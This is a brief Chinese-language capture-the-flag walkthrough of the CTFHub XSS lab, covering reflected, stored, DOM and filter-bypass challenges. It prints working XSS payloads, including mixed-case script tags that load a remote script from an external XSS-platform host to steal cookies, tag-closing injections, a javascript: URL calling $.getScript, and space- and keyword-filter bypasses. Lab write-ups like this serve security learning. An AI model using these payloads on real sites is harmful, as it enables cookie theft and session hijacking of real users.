CTFHub靶场————XSS

反射型

写入代码出现弹窗

查看脚本

 输入网页脚本+脚本

查看cookie获取flag

存储型

写入代码查看是否出现弹窗

插入脚本

<sCRiPt sRC=//uj.ci/1b1></sCrIpT>

插入脚本后将网址输入

去平台查看cookie获取flag

DOM反射

写入代码查看是否出现弹窗，查看源码发现存在xss但需要闭合后才可以出现弹窗

</script><script>alert(1)</script>

 查看脚本注意闭合（利用xss平台的脚本代码）

</tEXtArEa>'"><sCRiPt sRC=//uj.ci/1b1></sCrIpT>

 

查看cookie获取flag

 DOM跳转

检查是否存在弹窗，可以放在url地址栏上执行

?jumpto=javascript:alert(1)

放入脚本，使用$.getScript功能是异步加载并执行

?jumpto=javascript:$.getScript("//uj.ci/1b1")

 

查看cookie获取flag

 

过滤空格 

检查是否存在弹窗

<script>alert(1)</script>

 将代码带入

有空格，用/代替 

<sCRiPt/sRC=//uj.ci/1b1></sCrIpT>

 

查看cookie获取flag 

过滤关键词 

检测是否出现弹窗利用双写绕过过滤

<scrscriptipt>alert(1)</scrscriptipt>

 输入脚本执行

查看cookie获取flag